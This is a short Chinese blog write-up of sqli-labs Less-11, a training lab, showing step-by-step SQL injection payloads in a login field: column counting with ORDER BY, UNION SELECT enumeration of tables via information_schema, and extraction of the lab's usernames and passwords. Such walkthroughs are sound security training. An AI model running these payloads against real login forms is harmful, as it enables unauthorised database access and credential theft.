sqli-labs修炼の道 less-11

首先判断字段数目

 

Payload语句: admin' order by 2—s

  

正常显示故字段数目大于等于2

 

 

 

Payload语句: admin' order by 3—s

 

显示位置字段,结合前面的所以字段数为2

 

构造联合查询语句Payload发现显示位

 

 

显示位为1,2

Payload: adm' union select 1,2—s

 

注入查询当前用户以及当前数据库

 

 

Payload: adm' union select user(),database()—s

 

 

构造语句显示当前数据库的所有表名:

 

 

表名:emails,referers,uagents,users

Payload: adm' union select group_concat(table_name),database() from information_schema.tables where table_schema='security'—s

 

 

 

我们所需要的信息在users表中故

 

 

字段名: id,username,password

 

我们来查询username,password字段的内容

 

 

Username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

 

 

Username与Password一一对应

Payload: adm' union select group_concat(username),group_concat(password) from users-- s

 

posted @ 2017-07-01 22:03  v1ce0ye  阅读(205)  评论(0编辑  收藏  举报